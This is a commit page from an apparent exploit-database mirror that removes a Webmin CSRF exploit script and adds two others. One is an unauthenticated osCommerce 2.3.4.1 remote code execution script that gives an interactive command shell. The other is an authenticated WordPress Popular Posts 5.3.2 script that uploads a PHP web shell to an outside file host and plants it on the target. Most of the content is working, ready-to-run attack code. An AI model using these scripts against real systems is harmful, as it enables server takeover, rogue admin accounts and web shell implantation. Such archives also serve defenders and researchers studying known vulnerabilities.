bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-07-16

Browse source 
4 changes to exploits/shellcodes

Webmin 1.973 - Cross-Site Request Forgery (CSRF)
osCommerce 2.3.4.1 - Remote Code Execution (2)
WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
This commit is contained in:
Offensive Security 2021-07-16 05:01:53 +00:00
parent 42322e3bcd
commit 680397ce33
4 changed files with 362 additions and 231 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

230
exploits/linux/webapps/50126.py
View file

@ -1,230 +0,0 @@
# Exploit Title: Webmin 1.973 - Cross-Site Request Forgery (CSRF)
# Date: 24/04/2021
# Exploit Author: *Mesh3l_911 & Z0ldyck
# Vendor Homepage: https://www.webmin.com
# Repo Link: https://github.com/Mesh3l911/CVE-2021-31762
# Version: Webmin 1.973
# Tested on: All versions <= 1.973
# CVE : CVE-2021-31762
# POC: https://youtu.be/qCvEXwyaF5U
import time, subprocess
print('''\033[1;37m
__ __ _ ____ _ _________ _ _ _
| \/ | | | |___ \| | |___ / _ \| | | | | |
| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
__/ |
|___/
\033[1;m''')
for i in range(101):
print(
"\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
i), "\033[1;36m%\033[1;m", end="")
time.sleep(0.02)
print("\n\n")
target = input(
"\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
if target.endswith('/'):
target = target + 'acl/save_user.cgi'
else:
target = target + '/acl/save_user.cgi'
def CSRF_Generator():
with open('CSRF_POC.html', 'w') as POC:
POC.write \
('''
<html>
<head>
<meta name="referrer" content="never">
</head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="'''+target+'''" method="POST">
<input type="hidden" name="safe" value="" />
<input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="pass&#95;def" value="0" />
<input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" />
<input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" />
<input type="hidden" name="cert&#95;def" value="1" />
<input type="hidden" name="lang&#95;def" value="1" />
<input type="hidden" name="lang" value="af" />
<input type="hidden" name="notabs" value="0" />
<input type="hidden" name="theme&#95;def" value="1" />
<input type="hidden" name="theme" value="" />
<input type="hidden" name="overlay&#95;def" value="1" />
<input type="hidden" name="overlay" value="overlay&#45;theme" />
<input type="hidden" name="logouttime&#95;def" value="1" />
<input type="hidden" name="minsize&#95;def" value="1" />
<input type="hidden" name="ipmode" value="0" />
<input type="hidden" name="ips" value="" />
<input type="hidden" name="days&#95;def" value="1" />
<input type="hidden" name="hours&#95;def" value="1" />
<input type="hidden" name="hours&#95;hfrom" value="" />
<input type="hidden" name="hours&#95;mfrom" value="" />
<input type="hidden" name="hours&#95;hto" value="" />
<input type="hidden" name="hours&#95;mto" value="" />
<input type="hidden" name="mod" value="backup&#45;config" />
<input type="hidden" name="mod" value="change&#45;user" />
<input type="hidden" name="mod" value="webmincron" />
<input type="hidden" name="mod" value="usermin" />
<input type="hidden" name="mod" value="webminlog" />
<input type="hidden" name="mod" value="webmin" />
<input type="hidden" name="mod" value="help" />
<input type="hidden" name="mod" value="servers" />
<input type="hidden" name="mod" value="acl" />
<input type="hidden" name="mod" value="bacula&#45;backup" />
<input type="hidden" name="mod" value="init" />
<input type="hidden" name="mod" value="passwd" />
<input type="hidden" name="mod" value="quota" />
<input type="hidden" name="mod" value="mount" />
<input type="hidden" name="mod" value="fsdump" />
<input type="hidden" name="mod" value="ldap&#45;client" />
<input type="hidden" name="mod" value="ldap&#45;useradmin" />
<input type="hidden" name="mod" value="logrotate" />
<input type="hidden" name="mod" value="mailcap" />
<input type="hidden" name="mod" value="mon" />
<input type="hidden" name="mod" value="pam" />
<input type="hidden" name="mod" value="certmgr" />
<input type="hidden" name="mod" value="proc" />
<input type="hidden" name="mod" value="at" />
<input type="hidden" name="mod" value="cron" />
<input type="hidden" name="mod" value="sentry" />
<input type="hidden" name="mod" value="man" />
<input type="hidden" name="mod" value="syslog" />
<input type="hidden" name="mod" value="syslog&#45;ng" />
<input type="hidden" name="mod" value="system&#45;status" />
<input type="hidden" name="mod" value="useradmin" />
<input type="hidden" name="mod" value="apache" />
<input type="hidden" name="mod" value="bind8" />
<input type="hidden" name="mod" value="pserver" />
<input type="hidden" name="mod" value="dhcpd" />
<input type="hidden" name="mod" value="dhcp&#45;dns" />
<input type="hidden" name="mod" value="dovecot" />
<input type="hidden" name="mod" value="exim" />
<input type="hidden" name="mod" value="fetchmail" />
<input type="hidden" name="mod" value="foobar" />
<input type="hidden" name="mod" value="frox" />
<input type="hidden" name="mod" value="jabber" />
<input type="hidden" name="mod" value="ldap&#45;server" />
<input type="hidden" name="mod" value="majordomo" />
<input type="hidden" name="mod" value="htpasswd&#45;file" />
<input type="hidden" name="mod" value="minecraft" />
<input type="hidden" name="mod" value="mysql" />
<input type="hidden" name="mod" value="openslp" />
<input type="hidden" name="mod" value="postfix" />
<input type="hidden" name="mod" value="postgresql" />
<input type="hidden" name="mod" value="proftpd" />
<input type="hidden" name="mod" value="procmail" />
<input type="hidden" name="mod" value="qmailadmin" />
<input type="hidden" name="mod" value="mailboxes" />
<input type="hidden" name="mod" value="sshd" />
<input type="hidden" name="mod" value="samba" />
<input type="hidden" name="mod" value="sendmail" />
<input type="hidden" name="mod" value="spam" />
<input type="hidden" name="mod" value="squid" />
<input type="hidden" name="mod" value="sarg" />
<input type="hidden" name="mod" value="wuftpd" />
<input type="hidden" name="mod" value="webalizer" />
<input type="hidden" name="mod" value="link" />
<input type="hidden" name="mod" value="adsl&#45;client" />
<input type="hidden" name="mod" value="bandwidth" />
<input type="hidden" name="mod" value="fail2ban" />
<input type="hidden" name="mod" value="firewalld" />
<input type="hidden" name="mod" value="ipsec" />
<input type="hidden" name="mod" value="krb5" />
<input type="hidden" name="mod" value="firewall" />
<input type="hidden" name="mod" value="firewall6" />
<input type="hidden" name="mod" value="exports" />
<input type="hidden" name="mod" value="exports&#45;nfs4" />
<input type="hidden" name="mod" value="xinetd" />
<input type="hidden" name="mod" value="inetd" />
<input type="hidden" name="mod" value="pap" />
<input type="hidden" name="mod" value="ppp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;client" />
<input type="hidden" name="mod" value="pptp&#45;server" />
<input type="hidden" name="mod" value="stunnel" />
<input type="hidden" name="mod" value="shorewall" />
<input type="hidden" name="mod" value="shorewall6" />
<input type="hidden" name="mod" value="itsecur&#45;firewall" />
<input type="hidden" name="mod" value="tcpwrappers" />
<input type="hidden" name="mod" value="idmapd" />
<input type="hidden" name="mod" value="filter" />
<input type="hidden" name="mod" value="burner" />
<input type="hidden" name="mod" value="grub" />
<input type="hidden" name="mod" value="lilo" />
<input type="hidden" name="mod" value="raid" />
<input type="hidden" name="mod" value="lvm" />
<input type="hidden" name="mod" value="fdisk" />
<input type="hidden" name="mod" value="lpadmin" />
<input type="hidden" name="mod" value="smart&#45;status" />
<input type="hidden" name="mod" value="time" />
<input type="hidden" name="mod" value="vgetty" />
<input type="hidden" name="mod" value="iscsi&#45;client" />
<input type="hidden" name="mod" value="iscsi&#45;server" />
<input type="hidden" name="mod" value="iscsi&#45;tgtd" />
<input type="hidden" name="mod" value="iscsi&#45;target" />
<input type="hidden" name="mod" value="cluster&#45;passwd" />
<input type="hidden" name="mod" value="cluster&#45;copy" />
<input type="hidden" name="mod" value="cluster&#45;cron" />
<input type="hidden" name="mod" value="cluster&#45;shell" />
<input type="hidden" name="mod" value="cluster&#45;shutdown" />
<input type="hidden" name="mod" value="cluster&#45;usermin" />
<input type="hidden" name="mod" value="cluster&#45;useradmin" />
<input type="hidden" name="mod" value="cluster&#45;webmin" />
<input type="hidden" name="mod" value="cfengine" />
<input type="hidden" name="mod" value="heartbeat" />
<input type="hidden" name="mod" value="shell" />
<input type="hidden" name="mod" value="custom" />
<input type="hidden" name="mod" value="disk&#45;usage" />
<input type="hidden" name="mod" value="export&#45;test" />
<input type="hidden" name="mod" value="ftelnet" />
<input type="hidden" name="mod" value="filemin" />
<input type="hidden" name="mod" value="flashterm" />
<input type="hidden" name="mod" value="tunnel" />
<input type="hidden" name="mod" value="file" />
<input type="hidden" name="mod" value="phpini" />
<input type="hidden" name="mod" value="cpan" />
<input type="hidden" name="mod" value="htaccess&#45;htpasswd" />
<input type="hidden" name="mod" value="telnet" />
<input type="hidden" name="mod" value="ssh" />
<input type="hidden" name="mod" value="ssh2" />
<input type="hidden" name="mod" value="shellinabox" />
<input type="hidden" name="mod" value="status" />
<input type="hidden" name="mod" value="ajaxterm" />
<input type="hidden" name="mod" value="updown" />
<input type="hidden" name="mod" value="vnc" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
''')
POC.close()
print(
"\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
def main():
CSRF_Generator()
if __name__ == '__main__':
main()

89
exploits/php/webapps/50128.py Executable file
View file

@ -0,0 +1,89 @@
# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2)
# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin
# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: https://www.oscommerce.com/
# Version: osCommerce 2.3.4
# Tested on: Windows
import requests
import sys
if(len(sys.argv) != 2):
print("please specify the osCommerce url")
print("format: python3 osCommerce2_3_4RCE.py <url>")
print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog")
sys.exit(0)
baseUrl = sys.argv[1]
testVulnUrl = baseUrl + '/install/install.php'
def rce(command):
#targeting the finish step which is step 4
targetUrl = baseUrl + '/install/install.php?step=4'
payload = "');"
payload += "passthru('" + command + "');" # injecting system command here
payload += "/*"
#injecting parameter
data = {
'DIR_FS_DOCUMENT_ROOT': './',
'DB_DATABASE' : payload
}
response = requests.post(targetUrl, data=data)
if(response.status_code == 200):
#print('[*] Successfully injected payload to config file')
readCMDUrl = baseUrl + '/install/includes/configure.php'
cmd = requests.get(readCMDUrl)
commandRsl = cmd.text.split('\n')
if(cmd.status_code == 200):
#print('[*] System Command Execution Completed')
#removing the error message above
for i in range(2, len(commandRsl)):
print(commandRsl[i])
else:
return '[!] Configure.php not found'
else:
return '[!] Fail to inject payload'
#testing vulnerability accessing the directory
test = requests.get(testVulnUrl)
#checking the install directory still exist or able to access or not
if(test.status_code == 200):
print('[*] Install directory still available, the host likely vulnerable to the exploit.')
#testing system command injection
print('[*] Testing injecting system command to test vulnerability')
cmd = 'whoami'
print('User: ', end='')
err = rce(cmd)
if(err != None):
print(err)
sys.exit(0)
while(True):
cmd = input('RCE_SHELL$ ')
err = rce(cmd)
if(err != None):
print(err)
sys.exit(0)
else:
print('[!] Install directory not found, the host is not vulnerable')
sys.exit(0)

271
exploits/php/webapps/50129.py Executable file
View file

@ -0,0 +1,271 @@
# Exploit Title: WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)
# Date: 15/07/2021
# Exploit Author: Simone Cristofaro
# Vendor Homepage: https://it.wordpress.org/plugins/wordpress-popular-posts/
# Software Link: https://downloads.wordpress.org/plugin/wordpress-popular-posts.5.3.2.zip
# Version: 5.3.2 or below
# Tested on: Debian 10, WordPress 5.7.2, PHP version 7.3.27
# Reference: https://blog.nintechnet.com/improper-input-validation-fixed-in-wordpress-popular-posts-plugin/
# Notes: It's required that the Popular Posts widget is active (ie. in the footer section) and gd extension for PHP is
# enabled (otherwise WPP can't generate thumbnails). Also, the authenticated user must have "Contributor" role or above.
# This script will login with the provided credentials, create a new post and add a custom field with the link to a
# web shell, that will be automatically downloaded by the server. If you don't want to upload the file, you need to
# provide a URL to a web shell with SSL support (https) and make sure it contains the file name in it. If the plugin is
# set to show a fixed number of popular posts (ie. top 5), you just need to refresh the post page to make it go up ;)
'''
Banner:
'''
banner = """
* Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)
* @Heisenberg
"""
print(banner)
'''
Import required modules:
'''
import requests
import argparse
import json
import re
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Popular Posts plugin <= 5.3.2 - RCE (Authenticated)')
my_parser.add_argument('-t', help='--Target IP', metavar='IP', type=str, required=True, dest="target_ip")
my_parser.add_argument('-p', help='--Target port', type=str, metavar='PORT', default='80', dest="target_port")
my_parser.add_argument('-w', help='--Wordpress path (ie. /wordpress/)',metavar='PATH', type=str, required=True, dest="wp_path")
my_parser.add_argument('-U', help='--Username', metavar='USER', type=str, required=True, dest="username")
my_parser.add_argument('-P', help='--Password', metavar='PASS', type=str, required=True, dest="password")
args = my_parser.parse_args()
target_ip = args.target_ip
target_port = args.target_port
wp_path = args.wp_path
username = args.username
password = args.password
'''
# Hard coded parameters (if you don't like command line execution)
target_ip = "localhost"
target_port = "80"
wp_path = "/wordpress/"
username = "heisenberg"
password = "heisenberg"
'''
shell_name = 'exploit.gif.php'
payload = 'GIF <html> <body> <form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET[\'cmd\'])) { system($_GET[\'cmd\']); } ?> </pre> </body> </html>'
print('')
print('[*] Starting Exploit:')
'''
Upload file
'''
file_json = requests.post('https://api.bayfiles.com/upload', files={ 'file' : (shell_name, payload)})
resp = json.loads(file_json.text)
if resp['status']:
urlshort = resp['data']['file']['url']['full']
else:
print(f'[-] Error:'+ resp['error']['message'])
exit()
file_uploaded_site = requests.get(urlshort).text
PHP_URL = re.findall(r"(https?://\S+)("+shell_name+")",file_uploaded_site)[0][0] + shell_name
print(f'[+] Web Shell successfully uploadad at [{PHP_URL}].')
'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
# Header:
header = {
'Host': target_ip,
'User-Agent': 'Monies Browser 1.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Upgrade-Insecure-Requests': '1'
}
# Body:
body = {
'log': username,
'pwd': password,
'wp-submit': 'Log In',
'testcookie': '1'
}
# Authenticate:
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
print(f'[+] Authentication successfull as user [{username}] !')
else:
print('[-] Authentication failed ! Check username and password')
exit()
'''
Verify that the requirements are installed
'''
settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=debug'
settings_page = session.get(settings_page_url).text
search_string = ' gd'
if settings_page.find(search_string) == -1 :
print('[-] Error, gd extension for PHP is not installed/enabled on the server ! WPP can\'t generate thumbnails.')
exit()
'''
Get the wpp-admin-token
'''
settings_page_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/options-general.php?page=wordpress-popular-posts&tab=tools'
settings_page = session.get(settings_page_url).text
search_string = '<input type="hidden" id="wpp-admin-token" name="wpp-admin-token" value="'
search_string_end = '" />'
settings_page = settings_page[settings_page.find(search_string):]
wpp_admin_token = settings_page[72: settings_page.find(search_string_end)]
if wpp_admin_token:
print(f'[+] Acquired wpp-admin-token [{wpp_admin_token}].')
else:
print('[-] Error while gathering wpp-admin-token !')
exit()
'''
Apply changes to the Popular Posts plugin
'''
body = {
'upload_thumb_src': '',
'thumb_source': 'custom_field',
'thumb_lazy_load': 1,
'thumb_field': 'wpp_thumbnail',
'thumb_field_resize': 1,
'section': 'thumb',
'wpp-admin-token': wpp_admin_token
}
applied_changes = session.post(settings_page_url, headers=header, data=body).text
if applied_changes.find('<div class="notice notice-success is-dismissible"><p><strong>Settings saved.'):
print(f'[+] Settings applied successfully to the Popular Posts plugin. ')
else:
print('[-] Error while applying settings o the Popular Posts plugin!')
exit()
'''
Empty image cache
'''
body = {
'action': 'wpp_clear_thumbnail',
'wpp-admin-token': wpp_admin_token
}
applied_changes = session.post(settings_page_url, headers=header, data=body).text
print(f'[+] Images cache cleared. ')
'''
Get the new post ID and Nonce
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/post-new.php'
new_post_page = session.get(new_post_url).text
search_string = 'name="_ajax_nonce-add-meta" value="'
search_string_end = '" />'
new_post_page = new_post_page[new_post_page.find(search_string)+35:]
ajax_nonce = new_post_page[:new_post_page.find(search_string_end)]
search_string = 'wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware( "'
search_string_end = '" );'
new_post_page = new_post_page[new_post_page.find(search_string)+66:]
wp_nonce = new_post_page[:new_post_page.find(search_string_end)]
search_string = '},"post":{"id":'
search_string_end = ','
new_post_page = new_post_page[new_post_page.find(search_string)+15:]
post_ID = new_post_page[:new_post_page.find(search_string_end)]
if post_ID and wp_nonce and ajax_nonce:
print(f'[+] Acquired new post ID [{post_ID}], WP Nonce [{wp_nonce}] and AJAX Nonce [{ajax_nonce}].')
else:
if not post_ID: print('[-] Error while gathering post_ID !')
elif not wp_nonce: print('[-] Error while gathering Wordpress Nonce !')
elif not ajax_nonce : print('[-] Error while gathering Wordpress AJAX Nonce !')
exit()
'''
Publish a new post
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wp/v2/posts/'+post_ID+'?_locale=user'
data = {"id":post_ID,"title":"I'm the one who knocks","content":"<!-- wp:paragraph -->\n<p>upgrade your plugins</p>\n<!-- /wp:paragraph -->","status":"publish"}
header['X-WP-Nonce'] = wp_nonce
header['Content-Type'] = 'application/json'
header['X-HTTP-Method-Override'] = 'PUT'
new_post_page = session.post(new_post_url, headers=header, json=data).text
if new_post_page.find('"status":"publish"'):
print(f'[+] New post named [I\'m the one who knocks] published correctly!')
else:
print('[-] Error while publishing the new post !')
exit()
'''
Add the Custom Filed
'''
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'
header.pop('X-WP-Nonce')
header['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
header.pop('X-HTTP-Method-Override')
header['Accept']='*/*'
header['X-Requested-With'] = 'XMLHttpRequest'
body = {
'_ajax_nonce': 0,
'action': 'add-meta',
'metakeyselect': 'wpp_thumbnail',
'metakeyinput': "",
'metavalue' : PHP_URL,
'_ajax_nonce-add-meta': ajax_nonce,
'post_id' : post_ID
}
new_post_page = session.post(new_post_url, headers=header, data=body).text
if new_post_page.find("<tr id='meta-") > 0:
print(f'[+] Added a new Custom Field with the uploaded web shell.')
else:
print('[-] Error while adding the custom field !')
print(new_post_page)
exit()
'''
Give it some views to pop it up in the recent posts
'''
print(f'[+] Giving the new post some views (10) [ ', end="")
new_post_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php?page_id=' + post_ID
redirect_url = session.get(new_post_url).url
new_post_plugin_url = 'http://' + target_ip + ':' + target_port + wp_path + 'index.php/wp-json/wordpress-popular-posts/v1/popular-posts'
data = {
'_wpnonce': wp_nonce,
'wpp_id': post_ID,
'sampling': 0,
'sampling_rate': 100
}
for progress in range(10):
session.get(redirect_url)
res = session.post(new_post_plugin_url, headers=header, data=data)
print ('=', end='')
print(' ] '+json.loads(res.text)['results'])
print('[+] Exploit done !')
print(' -> Webshell: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/wordpress-popular-posts/' + post_ID +'_'+ shell_name)
print('')

3
files_exploits.csv
View file

@ -26042,7 +26042,6 @@ id,file,description,date,author,type,platform,port
12866,exploits/php/webapps/12866.txt,"K9 Kreativity Design - 'pages.php' SQL Injection",2010-06-03,Newbie_Campuz,webapps,php,
12867,exploits/php/webapps/12867.txt,"clickartweb Design - SQL Injection",2010-06-03,cyberlog,webapps,php,
12868,exploits/php/webapps/12868.txt,"Joomla! Component com_lead - SQL Injection",2010-06-03,ByEge,webapps,php,
50126,exploits/linux/webapps/50126.py,"Webmin 1.973 - Cross-Site Request Forgery (CSRF)",2021-07-14,Mesh3l_911,webapps,linux,
49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",2021-01-18,"Aitor Herrero",webapps,php,
49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",2021-01-18,"Aitor Herrero",webapps,php,
49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",2021-01-19,"Talat Mehmood",webapps,php,
@ -44263,3 +44262,5 @@ id,file,description,date,author,type,platform,port
50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",2021-07-13,"Alexandre ZANNI",webapps,php,
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",2021-07-13,"Luca Bernardi",webapps,php,
50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title and Author field' Stored Cross-Site Scripting (XSS)",2021-07-14,"Vikas Srivastava",webapps,php,
50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",2021-07-15,"Bryan Leong",webapps,php,
50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",2021-07-15,"Simone Cristofaro",webapps,php,

Can't render this file because it is too large.